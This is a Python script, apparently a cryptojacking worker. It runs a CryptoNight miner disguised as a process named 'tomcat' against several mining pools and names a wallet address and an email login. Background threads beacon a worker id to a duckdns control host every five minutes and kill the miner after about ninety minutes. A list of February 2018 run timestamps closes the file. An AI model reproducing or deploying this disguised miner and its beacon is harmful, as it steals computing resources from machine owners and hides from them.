import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:07.626454
#2018-02-17 17:15:06.912204
#2018-02-17 19:05:07.005737
#2018-02-17 20:53:06.212985
#2018-02-17 22:40:06.072586
#2018-02-18 00:23:05.267682
#2018-02-18 02:14:03.932397
#2018-02-18 04:01:06.047052
#2018-02-18 05:49:04.586421
#2018-02-18 07:41:03.977065
#2018-02-18 09:28:06.203610
#2018-02-18 11:14:05.121216
#2018-02-18 13:00:08.757476
#2018-02-18 14:49:07.184320
#2018-02-18 16:37:02.214985
#2018-02-18 18:25:07.917240
#2018-02-18 20:12:01.734450
#2018-02-18 21:57:07.549286
#2018-02-18 23:46:07.115074
#2018-02-19 01:33:06.158601
#2018-02-19 03:22:01.516235
#2018-02-19 05:07:05.568649
#2018-02-19 06:53:03.892402
#2018-02-19 08:43:07.002919
#2018-02-19 10:32:09.379645
#2018-02-19 12:20:06.700259
#2018-02-19 14:07:04.619506
#2018-02-19 15:56:01.835584
#2018-02-19 17:44:01.387614
#2018-02-19 19:32:04.429723
#2018-02-19 21:19:05.247795
#2018-02-19 23:04:08.363458
#2018-02-20 00:51:07.350352
#2018-02-20 02:40:05.899097
#2018-02-20 04:28:06.619938
#2018-02-20 06:12:06.078940
#2018-02-20 07:57:05.418660
#2018-02-20 09:42:07.087061
#2018-02-20 11:26:04.663194
#2018-02-20 13:12:07.397590
#2018-02-20 14:57:07.037605
#2018-02-20 16:42:09.900861
#2018-02-20 18:28:01.542358
#2018-02-20 20:19:07.949053
#2018-02-20 22:06:05.207980
#2018-02-20 23:48:03.675302
#2018-02-21 01:34:06.489562
#2018-02-21 03:22:05.732193
#2018-02-21 05:11:07.783419
#2018-02-21 07:01:01.521702
#2018-02-21 08:47:01.391038
#2018-02-21 10:33:03.930625
#2018-02-21 12:21:08.276594
#2018-02-21 14:08:08.943667
#2018-02-21 15:53:04.234884
#2018-02-21 17:44:08.586330
#2018-02-21 19:29:08.186104
#2018-02-21 21:17:01.889095
#2018-02-21 23:03:08.063557
#2018-02-22 00:53:02.176091
#2018-02-22 02:40:07.366715
#2018-02-22 04:28:04.010450
#2018-02-22 06:14:03.419710
#2018-02-22 07:58:08.745848
#2018-02-22 09:46:01.885821
#2018-02-22 11:31:06.000183
#2018-02-22 13:18:07.950660
#2018-02-22 15:07:01.863912
#2018-02-22 16:50:09.534221
#2018-02-22 18:40:11.855478
#2018-02-22 20:31:04.324497
#2018-02-22 22:16:01.627025
#2018-02-23 00:04:04.812994
#2018-02-23 01:53:04.685285
#2018-02-23 03:47:06.278838
#2018-02-23 05:35:08.727930
#2018-02-23 07:20:08.336181
#2018-02-23 09:24:06.624767
#2018-02-23 11:29:06.732937
#2018-02-23 13:19:08.834724
#2018-02-23 15:05:08.024380
#2018-02-23 16:55:10.767633
#2018-02-23 18:44:08.290756
#2018-02-23 20:31:05.507745
#2018-02-23 22:18:01.943126
#2018-02-24 00:04:07.107381
#2018-02-24 01:56:05.504020
#2018-02-24 03:47:04.528974
#2018-02-24 05:37:05.281783
#2018-02-24 07:24:01.798285
#2018-02-24 09:14:01.630894
#2018-02-24 11:05:01.312432
#2018-02-24 12:53:05.863221
#2018-02-24 14:41:01.994394
#2018-02-24 16:32:04.861145
#2018-02-24 18:21:07.583274
#2018-02-24 20:07:06.736769
#2018-02-24 21:51:05.939069
#2018-02-25 00:51:04.513271
#2018-02-25 04:37:03.654324
#2018-02-25 08:03:01.686420